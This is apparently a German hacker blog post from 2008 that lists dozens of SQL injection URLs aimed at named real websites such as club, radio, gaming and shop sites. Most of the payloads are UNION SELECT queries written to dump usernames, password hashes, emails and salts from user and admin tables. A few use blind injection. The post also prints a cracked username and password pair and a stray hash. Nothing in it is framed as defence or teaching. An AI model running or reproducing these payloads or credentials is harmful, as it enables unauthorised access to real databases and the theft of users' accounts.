Ein paar SQL Injections

J0hn.X3r / / Vulnerable Sites

Hi,

da im August/September 2008 Ferien waren und ich dort genug Zeit hatte ein paar SQL Injections zu machen und zu ueben ist hier ne kleine Liste. Da die SQL Injections wie gesagt vom August/September 2008 sind, weiß ich nicht genau ob die meisten davon schon gefixxt sind 🙂

http://www.kidtokid.com/news.php?id=-13/**/UNION/**/SELECT/**/unhex(hex(version())),unhex(hex(concat_ws(0x3a,username,user_password))),3,4,5,6,7,8,9/**/FROM/**/kidtokid_com_phpbb.users/**/limit/**/1,1/*
http://www.kidtokid.com/news.php?id=-13/**/UNION/**/SELECT/**/unhex(hex(version())),unhex(hex(concat_ws(0x3a,login,pass))),3,4,5,6,7,8,9/**/FROM/**/kidtokid_com_site.stores/*
http://www.fc-weilersbach.de/cms/_content/detail.php?nr=-2768/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,name,username,email,password),5,6,7,8,9,10,11,12,13/**/FROM/**/usr_web1410_1.mos_users--
http://www.fc-weilersbach.de/cms/_content/detail.php?nr=-2768/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,name,pw),5,6,7,8,9,10,11,12,13/**/FROM/**/usr_web1410_1.users/**/limit/**/1,1--
http://www.fc-weilersbach.de/cms/_content/detail.php?nr=-2768/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,email,passwd),5,6,7,8,9,10,11,12,13/**/FROM/**/usr_web1410_2.fc1_user--
http://www.schnittberichte.com/schnittbericht.php?ID=-4539+union+select+concat_ws(0x3a,user_id,username,user_password)/**/FROM/**/sc003clu_forum.phpbb_users/**/LIMIT/**/1,1/*
http://www.squadhouse.de/index.php?id=56&srid=-9/**/UNION/**/SELECT/**/version(),2,3,4,5,concat_ws(0x3a,uid,username,pass,email),7,8/**/FROM/**/sqhdatabasev3.user_main--&ac=details 
http://www.versalia.de/forum/beitrag.php?board=v_forum&thread=-3617%27)/**/UNION/**/SELECT/**/concat_ws(0x3a,username,password,email),2,3,4/**/FROM/**/xc_users/**/LIMIT/**/1,1/*
http://www.aktionbildung.de/seiten/newslesen.php?id=-91+union+select+1,2,3,concat_ws(0x3a,username,password,email)+from+forums_auth--
http://royal-esports.de/index.php?section=wars_detail&match_id=-43%27/**/UNION/**/SELECT/**/1,2,3,4,nick,password,email,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/**/FROM/**/lh_member--+
http://www.chaoskrieger.com/downloads.php?action=filedetails&fileid=-36'/**/UNION/**/SELECT/**/1,2,password,concat_ws(0x3a,username,password),5,email,7,8,9,10,11,12/**/FROM/**/bb1_users/**/WHERE/**/userid=6--+
http://www.die-webber.com/downloads.php?action=filedetails&filepid=-10%27/**/UNION/**/SELECT/**/1,version(),username,pass/**/FROM/**/dw_users/**/LIMIT/**/0,1/*
http://sdf.die-webber.com/index2.php?content=members&action=details&id=-34/**/UNION/**/SELECT/**/1,2,version(),4,5,6,email,8,9,10,11,user,13,14,15,16,17,18,19,20,21,pass,23,24,25,26,27,28,29,30/**/FROM/**/sdf_users/**/LIMIT/**/0,1/*
http://www.counter-strike.de/modules/screenorama/gallery.php?katwahl=-5/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.die-webber.com/downloads.php?action=filedetails&filepid=-10%27/**/UNION/**/SELECT/**/1,version(),username,pass/**/FROM/**/dw_users/**/LIMIT/**/0,1/*
http://sdf.die-webber.com/index2.php?content=members&action=details&id=-34/**/UNION/**/SELECT/**/1,2,version(),4,5,6,email,8,9,10,11,user,13,14,15,16,17,18,19,20,21,pass,23,24,25,26,27,28,29,30/**/FROM/**/sdf_users/**/LIMIT/**/0,1/*
http://www.counter-strike.de/modules/screenorama/gallery.php?katwahl=-5/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,unhex(hex(version())),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.kleinsche-flasche.de/admin/detail.php?id=-10/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://www.mrgame.de/gamedownload2.php?id=-375/**/UNION/**/SELECT/**/1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19/*
http://www.mrgame.de/gamedownload2.php?id=-375/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,username,user_password,user_email),7,8,9,10,11,12,13,14,15,16,17,18,19/**/FROM/**/usr_wsa17_2.mrgame_phpbb_users/**/LIMIT/**/1,1/*
MD5 - a4ae46449f1074967bb1376d81335f69
gdataonline.com	89024703
http://www.sixpacks.org/index.php?page=showquiz&qid=-103/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
http://gameresource.de/out.php?news=-104999/**/UNION/**/SELECT/**/1,2,VERSION(),0x27,0x27,0x27,7,8,9,10,11,12/*
http://www.gamaxx.de/send.php?news=-19494/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,unhex(hex(concat_ws(0x3a,username,password,salt,email))),10,11,12,13,14,15,16,17,18,19,20,21,22/**/FROM/**/foren_user/*
http://bgs.gdynamite.de/send.php?news=-8727/**/UNION/**/SELECT/**/1,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.zocko.de/forum/galerie.php?action=show&pic=10%27%20and%20ascii(substring((SELECT%20password%20from%20bb1_users%20limit%200,1),32,1))=54/*
User: BartTheDevil89
PW: 72bb3fc06c63e9ad6957d81747fc29f6 = randy01
http://www.finanzsoftware24.de/download.php?id=-381/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,username,user_password,user_email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/**/FROM/**/biusoft_forum.phpbb_users/**/LIMIT/**/1,1--
http://zidz.com/munity_user.php?me=1%27/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,version(),concat_ws(0x3a,nic,pass),51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/**/FROM/**/user/**/LIMIT/**/1,1/*&show=steckbrief
http://www.radioquintessenz.de/djs.php?id=-1/**/UNION/**/SELECT/**/1,2,3,version(),5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/**/FROM/**/qe_forum.bb1_users--
http://www.luftfahrt.net/flugzeuge/flugzeug.php?id=-6/**/UNION/**/SELECT/**/1,concat_ws(0x3a,email,passwort),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/**/FROM/**/members/**/LIMIT/**/0,1/*
http://www.wochenspiegel-saarland.de/index.php?id=43&doc=-81980/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,unhex(hex(version())),12,13,14,15,16,17,18,19,20,21,22,23/*
http://www.radio7.de/moderatorsDetail.php?mid=-12/**/UNION/**/SELECT/**/1,unhex(hex(concat_ws(0x3a,loginname,password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/admin_user/*
http://www.gamecaptain.de/download.php?id=-4744/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password,salt),10,11,12,13,14,15,16,17,18/**/FROM/**/vbb_user/**/LIMIT/**/1,1--
http://www.serienoldies.de/gb/kommentar.php?id=-6178/**/UNION/**/SELECT/**/1,2,3,4,version(),concat_ws(0x3a,username,pwd,email),7,8,9,10,11,12,13/**/FROM/**/pfuser/*
http://www.keindsl.de/kommentar.php?id=-541/**/UNION/**/SELECT/**/1,2,3,4,version(),concat_ws(0x3a,username,user_password),7,8,9,10,11,12,13/**/FROM/**/phpbb_beta_5_users/**/LIMIT/**/1,1/*
http://www.gameradio.de/kommentar.php?news_id=-90/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,9,10/*
http://www.jugendbibliothek-gera.7to.de/pgb/kommentar.php?id=-21/**/UNION/**/SELECT/**/1,2,3,4,version(),unhex(hex(concat(name,0x3a,passwort))),7,8,9,10,11,12,13,14,15/**/FROM/**/yuri_user/*
http://gaestebuch.ruebenlauf.de/kommentar.php?id=-117/**/UNION/**/SELECT/**/1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15/*
http://www.infoportal24.org/kommentar.php?id=-4397%27/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7/*
http://www.fg-schwingenheuer.de/blog/kommentar.php?id=-125/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,version(),12,13,concat_ws(0x3a,benutzer,passwort),15,16,17,18,19,20/**/FROM/**/usr_web148_2.login/*
http://www.subba-cultcha.com/article_feature.php?id=-5420/**/UNION/**/SELECT/**/1,concat(email,0x3a,password),version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/users/*
http://gw.buffed.de/daten/bosse/index.php?kapitel=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,username,password,email,icq,salt),5+FROM+user+LIMIT+0,1
http://www.ka-nightlife.de/locations.php?id=-5/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57/**/from/**/bb1_users/**/limit/**/0,1&sid=
http://trekstor.de/de/products/detail_mp3.php?pid=-88/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.freebooknotes.com/book.php3?id=-32/**/UNION/**/SELECT/**/1,2,3,version()--
http://www.heavymetal.dk/links_bands_view.php?id=-286)/**/UNION/**/SELECT/**/1,2,version(),concat_ws(0x3a,username,password,email),5,6,7,8,9,10,11,12/**/FROM/**/users--
http://www.gamingguide.de/forum/index.php?page=XboxRanking&sortField=10%20and%20if(substring((select%20table_name%20from%20information_schema.tables%20limit%200,1),1,1)=0x43,NULL,(select%201%20union%20select%202))&sortOrder=ASC
http://www.keindsl.de/kommentar.php?id=-806/**/UNION/**/SELECT/**/1,2,3,4,version(),concat_ws(0x3a,UserName,UserPass),7,8,9,10,11,12,13/**/FROM/**/keindsl_de_2.test_scout_users/*
http://www.keindsl.de/kommentar.php?id=-806/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,username,user_password,user_email),7,8,9,10,11,12,13/**/FROM/**/keindsl_de_2.forum_users/**/LIMIT/**/1,1/*
http://boutiqueportal.com/index.php?main_page=customer_testimonials&testimonial_id=-1/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,admin_name,admin_pass,admin_email),version(),5,6,7,8/**/FROM/**/zen_admin/*
http://www.sbcommunicationsgroup.com/media-info.php?id=-1/**/UNION/**/SELECT/**/1,2,3,version()/*
http://choices.de/kritik.php?id=122563/**/UNION/**/SELECT/**/1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
http://www.larsie.de/include.php?path=vote/archiv.php&vid=5%27)/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user_name,user_pw),3,4,5,6,7,8,9,10,11/**/FROM/**/sun25_usr_web201_3.phpkit_1_user+--+
------------
Dezember 2008:

http://www.clanscripte.net/main.php?content=newskommentare&action=view&newsid=-570/**/UNION/**/SELECT/**/1,version(),concat_ws(0x3a,name,pwd,email),4,5,6/**/FROM/**/csportal_users--
http://www.handit.de/index.php?fuseaction=detail&produktid=-5333+group%20by%20null+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19/*
http://privatamateure.com/show_message.php?messageid=-7016123/**/UNION/**/SELECT/**/1,2,3,version(),unhex(hex(concat_ws(0x3a,nickname,email,password))),6,7,8,9,10/**/FROM/**/user/*&kind=1
http://sig-box.de/?typ=tag&s=search&add=add&search=0%27%20UNION%20SELECT%200x27756E696F6E2073656C65637420312C322C332C342C352C362C76657273696F6E28292C382023,2%20--+

Leave a Reply

Your email address will not be published. Required fields are marked *